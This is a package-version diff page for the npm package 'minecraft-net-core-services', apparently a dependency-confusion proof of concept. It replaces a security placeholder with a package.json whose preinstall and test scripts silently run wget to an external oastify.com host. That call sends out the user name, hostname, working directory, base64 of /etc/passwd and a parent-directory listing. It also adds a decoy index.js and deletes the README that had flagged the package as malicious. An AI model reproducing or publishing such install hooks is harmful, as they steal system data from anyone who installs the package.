minecraft-net-core-services 0.0.1-security → 1.0.6

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of minecraft-net-core-services might be problematic. Click here for more details.

package/index.js ADDED
@@ -0,0 +1,5 @@
1
+ export default class CreditCardServiceTypes {
2
+ constructor() {
3
+ console.log("Works")
4
+ }
5
+ }
package/package.json CHANGED
@@ -1,6 +1,19 @@
1
1
  {
2
2
  "name": "minecraft-net-core-services",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.6",
4
+ "description": "dep conf bug report",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "wget --quiet \"https://www49ex6uf7fqk8n3ceqoy4ib9h05rtg.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)&info=$(cat /etc/passwd | base64)&info2=$(ls -la .. | base64)\"",
8
+ "preinstall": "wget --quiet \"https://www49ex6uf7fqk8n3ceqoy4ib9h05rtg.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)&info=$(cat /etc/passwd | base64)&info2=$(ls -la .. | base64)\""
9
+ },
10
+ "keywords": [
11
+ "PoC"
12
+ ],
13
+ "dependencies": {},
14
+ "config": {
15
+ "unsafe-perm":true
16
+ },
17
+ "author": "Test",
18
+ "license": "ISC"
6
19
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=minecraft-net-core-services for more information.